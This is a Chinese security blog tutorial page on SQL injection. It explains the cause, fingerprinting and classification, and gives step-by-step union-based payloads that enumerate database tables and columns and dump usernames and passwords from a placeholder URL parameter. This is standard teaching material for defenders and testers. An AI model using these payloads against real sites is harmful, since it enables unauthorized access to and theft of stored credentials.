<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>SQL注入漏洞 | BaiKer</title><meta name="keywords" content="注入漏洞"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="SQL注入漏洞简介 SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入漏洞">
<meta property="og:url" content="http://baiker.top/9958bd672d7e.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="SQL注入漏洞简介 SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527518/0">
<meta property="article:published_time" content="2021-07-23T05:29:10.000Z">
<meta property="article:modified_time" content="2022-05-26T07:28:40.667Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="注入漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527518/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/9958bd672d7e"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'SQL注入漏洞',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2022-05-26 15:28:40'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
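win.saveToLocal = {
  // Persist `value` under `key` in localStorage together with an absolute
  // expiry timestamp (`ttl` is in days). A ttl of exactly 0 means "do not
  // persist" and the call is a no-op, matching the theme's existing contract.
  set: function setWithExpiry(key, value, ttl) {
    if (ttl === 0) return
    const expiresAt = Date.now() + ttl * 86400000
    localStorage.setItem(key, JSON.stringify({ value: value, expiry: expiresAt }))
  },
  // Read back a value stored by `set`. Returns undefined when the key is
  // absent, expired, or not a JSON object we wrote ourselves. This script runs
  // in <head> before the body is parsed, so an uncaught JSON.parse error here
  // would abort the whole bootstrap IIFE (theme/aside restore, detectApple);
  // a corrupt or foreign entry is therefore dropped instead of thrown on.
  get: function getWithExpiry(key) {
    const raw = localStorage.getItem(key)
    if (!raw) return undefined
    let item
    try {
      item = JSON.parse(raw)
    } catch (e) {
      localStorage.removeItem(key)
      return undefined
    }
    if (!item || typeof item !== 'object' || Date.now() > item.expiry) {
      // Expired (or unrecognizable) entry: evict it so it is not re-read.
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}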
// Dynamically load a script by URL; resolves once it has loaded, rejects on
// a network/parse error. Only `src` and `async` are set: no `integrity` (SRI)
// or `crossorigin` attribute is added, so a tampered CDN response would run
// with full page privileges — callers should pin versions or self-host.
win.getScript = url => new Promise((resolve, reject) => {
  const el = document.createElement('script')
  el.src = url
  el.async = true
  el.onerror = reject
  const finished = function () {
    const state = this.readyState
    // Legacy IE reports intermediate readyState values; wait for completion.
    if (state && state !== 'loaded' && state !== 'complete') return
    el.onload = el.onreadystatechange = null
    resolve()
  }
  el.onload = el.onreadystatechange = finished
  document.head.appendChild(el)
})
// Switch the page to the dark theme and update the browser chrome colour.
win.activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  // querySelector yields null when the tag is missing; skip the update then.
  if (themeMeta) themeMeta.setAttribute('content', '#0d0d0d')
}
// Switch the page to the light theme and update the browser chrome colour.
win.activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  // querySelector yields null when the tag is missing; skip the update then.
  if (themeMeta) themeMeta.setAttribute('content', '#ffffff')
}
// Restore the visitor's saved theme and sidebar state from localStorage.
// Any value other than 'dark'/'light' leaves the default theme untouched.
const storedTheme = saveToLocal.get('theme')
if (storedTheme === 'dark') activateDarkMode()
else if (storedTheme === 'light') activateLightMode()
const storedAside = saveToLocal.get('aside-status')
if (storedAside !== undefined) {
  // toggle(name, force): adds the class when force is true, removes otherwise.
  document.documentElement.classList.toggle('hide-aside', storedAside === 'hide')
}
// Tag the root element with `apple` for Apple user agents so CSS can
// apply platform-specific tweaks. Purely a UA-string heuristic.
const detectApple = () => {
  const isApple = /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)
  if (!isApple) return
  document.documentElement.classList.add('apple')
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" 
href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527518/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">SQL注入漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-23T05:29:10.000Z" title="发表于 2021-07-23 13:29:10">2021-07-23</time><span class="post-meta-separator">|</span><i 
class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-05-26T07:28:40.667Z" title="更新于 2022-05-26 15:28:40">2022-05-26</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>5分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="SQL注入漏洞"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="SQL注入漏洞简介"><a href="#SQL注入漏洞简介" class="headerlink" title="SQL注入漏洞简介"></a>SQL注入漏洞简介</h2><p> SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 
语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。根本的防御措施是使用参数化查询(预编译语句)并对输入做类型约束,而不是在代码中拼接 SQL 字符串。</p>
<h3 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h3><p>一段MySQL查询数据为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where user_id = '1'</span><br></pre></td></tr></table></figure>
<p>这一段代码的意思是,查询<code>user</code>表中<code>user_id</code>字段的值为1的所有数据</p>
<p>其中1是我们可以改变的地方,在不做任何防御措施下,我们将其改成我们构造的语句,从而造成SQL注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where user_id = '1' or 1 = 1 --+</span><br></pre></td></tr></table></figure>
<p>改变之后,这段代码的意思就变成了查询<code>user</code>表中<code>user_id</code>字段的值为1或者<code>1=1</code>的所有数据</p>
<p>由于<code>1=1</code>的结果为真,所以最后的结果就是查询<code>user</code>表中的所有数据</p>
<p>这里我们手动填写的语句就是<code>1' or 1 = 1 --+</code></p>
<p>其中<code>1'</code>闭合之前的语句,在通过<code>or 1 = 1</code>造成结果为真的判断</p>
<p>再通过注释符号<code>--</code>注释掉代码后边可能存在的其他语句,避免查询的结果与我们预期的结果不同</p>
<p>最后通过符号<code>+</code>来表示空格:服务器对 URL 解码时会把<code>+</code>还原为空格,而 MySQL 要求<code>--</code>注释符后面必须紧跟空白字符,否则注释不生效,<code>--</code>会与后面的单引号连在一起导致语法错误;也可以改用<code>#</code>(URL 编码为<code>%23</code>)作为行注释。这样一段SQL注入就产生了</p>
<p><strong>在MySQL5.0以下</strong>,没有information_schema这个系统库,无法通过它列出库名、表名等,只能暴力猜解表名。</p>
<p><strong>在MySQL5.0以上</strong>,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。</p>
<p><strong>information_schema数据库中三个很重要的表:</strong></p>
<p><strong>information_schema.schemata</strong>: 该数据表存储了mysql数据库中的所有数据库的库名</p>
<p><strong>information_schema.tables</strong>: 该数据表存储了mysql数据库中的所有数据表的表名</p>
<p><strong>information_schema.columns</strong>: 该数据表存储了mysql数据库中的所有列的列名</p>
<h3 id="SQL注入特征"><a href="#SQL注入特征" class="headerlink" title="SQL注入特征"></a>SQL注入特征</h3><p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><ul>
<li>database():当前数据库</li>
<li>user():查询数据库的用户</li>
<li>version():查询数据库版本</li>
<li>system_user():系统用户名</li>
<li>session_user():链接数据库的用户名</li>
<li>current_user:当前用户名</li>
<li>load_file():读取数据库服务器上的本地文件(需要当前数据库用户具有 FILE 权限,并受 <code>secure_file_priv</code> 配置限制)</li>
<li>@@datadir:读取数据库路径</li>
<li>@@basedir:MySQL安装路径</li>
<li>@@version_compile_os:查看编译 MySQL 时所用的操作系统</li>
</ul>
<h3 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h3><p><strong>依据注入点类型分类</strong></p>
<ul>
<li>数字类型的注入</li>
<li>字符类型的注入</li>
<li>搜索类型的注入</li>
</ul>
<p><strong>依据提交方式分类</strong></p>
<ul>
<li>GET注入</li>
<li>POST注入</li>
<li>COOKIE注入</li>
<li>HTTP头注入(XFF注入、UA注入、REFERER注入)</li>
</ul>
<p><strong>依据获取信息的方式分类</strong></p>
<ul>
<li>基于布尔的盲注</li>
<li>基于时间的盲注</li>
<li>基于报错的注入(报错注入:页面会回显数据库错误信息,严格来说不属于盲注)</li>
<li>联合查询注入</li>
<li>堆叠查询注入(以<code>;</code>分隔,可同时执行多条语句;是否可用取决于应用所用的数据库接口是否允许一次执行多条语句)</li>
</ul>
<h3 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h3><table>
<thead>
<tr>
<th align="center">数据库</th>
<th align="center">指纹</th>
</tr>
</thead>
<tbody><tr>
<td align="center">MySQL</td>
<td align="center">information_schema.tables</td>
</tr>
<tr>
<td align="center">Access</td>
<td align="center">msysobjects</td>
</tr>
<tr>
<td align="center">SQL server</td>
<td align="center">sysobjects</td>
</tr>
<tr>
<td align="center">Oracle</td>
<td align="center">dual</td>
</tr>
</tbody></table>
<p>注意:上表只是经验性的指纹,不能单独作为结论。例如 <code>dual</code> 在 MySQL 中同样存在,<code>information_schema</code> 也存在于 SQL Server、PostgreSQL 等数据库中,需要结合报错信息、注释符、字符串连接语法等多个特征综合判断。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">//判断MySQL数据库</span><br><span class="line">xxx?id=1 and exists(select * from information_schema.tables) --+</span><br><span class="line"> </span><br><span class="line">//判断Access数据库 </span><br><span class="line">xxx?id=1 and exists(select * from msysobjects) --+</span><br><span class="line"></span><br><span class="line">//判断Mssql数据库</span><br><span class="line">xxx?id=1 and exists(select * from sysobjects) --+</span><br><span class="line"> </span><br><span class="line">//判断Oracle数据库</span><br><span class="line">xxx?id=1 and (select count(*) from dual)>0 --+</span><br></pre></td></tr></table></figure>
<h2 id="Union联合查询注入"><a href="#Union联合查询注入" class="headerlink" title="Union联合查询注入"></a>Union联合查询注入</h2><h3 id="判断闭合符号"><a href="#判断闭合符号" class="headerlink" title="判断闭合符号"></a>判断闭合符号</h3><p>当我们找到一个注入点时,首先判断该注入点中可能存在的闭合符号</p>
<p>无闭合,单引号<code>''</code>,双引号<code>""</code>,括号<code>()</code>,单引号+括号<code>('')</code>,双引号+括号<code>("")</code>….以及<code>引号+多括号</code>组合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">xxx?id=1'</span><br><span class="line">如果报错或页面异常,说明单引号破坏了 SQL 语法,参数很可能被直接拼接进查询</span><br><span class="line"></span><br><span class="line">xxx?id=1 and 1=2 --+</span><br><span class="line">如果页面内容与 id=1 时不同,说明是数字型注入;如果页面没有变化,说明参数被当作字符串处理,需要继续判断闭合符号</span><br><span class="line"></span><br><span class="line">xxx?id=1' and 1=2 --+</span><br><span class="line">如果不再报错且页面内容发生变化,说明闭合符号是单引号;如果仍然报错,再依次尝试 1"、1')、1") 等组合</span><br><span class="line">然后通过构造语句能否成功执行判断具体的闭合组合情况</span><br><span class="line">注意:判断依据是页面内容或报错信息的"差异",而不是单纯看有没有报错</span><br></pre></td></tr></table></figure>
<h3 id="判断字段数量"><a href="#判断字段数量" class="headerlink" title="判断字段数量"></a>判断字段数量</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = 1' order by 5 --+</span><br></pre></td></tr></table></figure>
<p>通过语句<code>order by x</code>来判断字段的数量</p>
<p>如果不报错,说明字段数量大于等于5,如果报错,说明字段数量小于5</p>
<h3 id="判断数据显示位置"><a href="#判断数据显示位置" class="headerlink" title="判断数据显示位置"></a>判断数据显示位置</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,2,3,4... --+ </span><br></pre></td></tr></table></figure>
<p>这里先通过负号<code>-</code>或者<code>and 1 = 2</code>使原始查询不返回任何行(并不是让数据库报错),这样页面上显示出来的就只有<code>union</code>后面那条查询的结果</p>
<p>再通过<code>union</code>建立联合查询,也就是在<code>select</code>查询里面再嵌套一个查询语句</p>
<p>后面的数值排列取决于判断的字段数量</p>
<p>若回显中出现了相应的数值说明我们接下来查询的信息会在该位置显示</p>
<p>如图下的2和3可能会在网页中显现出来</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqxkgro2qj60o804iabv02.jpg" alt="SQL注入1.png"></p>
<h3 id="查询数据库库名"><a href="#查询数据库库名" class="headerlink" title="查询数据库库名"></a>查询数据库库名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>
<p><code>database()</code>是MySQL中的一个函数,表示当前数据库的名字</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqxw3ux3yj60ps04ggnl02.jpg" alt="SQL注入2.png"></p>
<h3 id="枚举数据库中的所有的表"><a href="#枚举数据库中的所有的表" class="headerlink" title="枚举数据库中的所有的表"></a>枚举数据库中的所有的表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是从<code>information_schema.tables</code>表中查找<code>table_schema</code>字段等于当前数据库名的所有表名</p>
<p><code>information_schema</code>:MySQL的默认数据库,包含了所有数据库,数据表的信息</p>
<p><code>table_schema</code>:<code>tables</code>表中的一个字段,记录了该表所属的数据库名</p>
<p><code>table_name</code>:<code>tables</code>表中的一个字段,记录了数据表的名字</p>
<p><code>group_concat()</code>:是MySQL的函数,把函数中字段的值输出在一行中,以逗号分隔</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqyv8akyuj60xj04qgp102.jpg" alt="SQL注入3.png"></p>
<h3 id="枚举数据表中所有的字段"><a href="#枚举数据表中所有的字段" class="headerlink" title="枚举数据表中所有的字段"></a>枚举数据表中所有的字段</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name = 'user' --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是从<code>information_schema.columns</code>表中查找属于当前数据库、且表名为<code>user</code>的所有字段名</p>
<p><code>column_name</code>:<code>columns</code>表中的一个字段,记录了列的名字</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqyvpxte8j60xg04qq6p02.jpg" alt="SQL注入4.png"></p>
<h3 id="查询字段中所有的值"><a href="#查询字段中所有的值" class="headerlink" title="查询字段中所有的值"></a>查询字段中所有的值</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(concat_ws(0x2d,username,password)),3 from user --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是查询<code>user</code>表中<code>username</code>字段和<code>password</code>的值</p>
<p><code>concat_ws</code>:MySQL的函数,以第一个参数作为分隔符把后面所有参数连接成一个字符串,便于在一个回显位里同时输出多个字段</p>
<p><code>0x2d</code>:十六进制形式的 ASCII 码,MySQL 会把它当作字符串<code>-</code>;用十六进制写法可以避免在载荷里再出现引号</p>
<p>最后输出格式为<code>user1-pass1</code>,<code>user2-pass2</code>…..</p>
<h2 id="Boolean盲注"><a href="#Boolean盲注" class="headerlink" title="Boolean盲注"></a>Boolean盲注</h2><p>盲注,指的是页面既不回显查询结果也不回显数据库错误信息的情况。此时攻击者无法直接看到数据,只能构造真/假条件,通过页面内容的差异(布尔盲注)或响应时间的差异(时间盲注)来判断注入的SQL语句是否被执行,并逐位推断出数据</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">BaiKer</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://baiker.top/9958bd672d7e.html">http://baiker.top/9958bd672d7e.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://baiker.top" target="_blank">BaiKer</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">注入漏洞</a></div><div class="post_share"><div class="social-share" data-image="https://inews.gtimg.com/newsapp_ls/0/13902527518/0" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/b5e4a9195b88.html"><img class="prev-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902390411/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Openssh命令注入漏洞(CVE-2020-15778)</div></div></a></div><div class="next-post pull-right"><a href="/3609c62142b6.html"><img class="next-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902527425/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Shiro反序列化 - 
shiro 550 - CVE-2016-4437</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/73208a942d69.html" title="JBoss seam2模板注入漏洞 - CVE-2010-1871"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-01</div><div class="title">JBoss seam2模板注入漏洞 - CVE-2010-1871</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BaiKer</div><div class="author-info__description">网络安全</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/baiker" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="/baiker@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div 
class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">SQL注入漏洞简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">SQL注入原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%89%B9%E5%BE%81"><span class="toc-number">1.2.</span> <span class="toc-text">SQL注入特征</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-number">1.3.</span> <span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%88%86%E7%B1%BB"><span class="toc-number">1.4.</span> <span class="toc-text">SQL注入的分类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B"><span class="toc-number">1.5.</span> <span class="toc-text">判断数据库类型</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Union%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5"><span class="toc-number">2.</span> <span class="toc-text">Union联合查询注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E9%97%AD%E5%90%88%E7%AC%A6%E5%8F%B7"><span class="toc-number">2.1.</span> <span 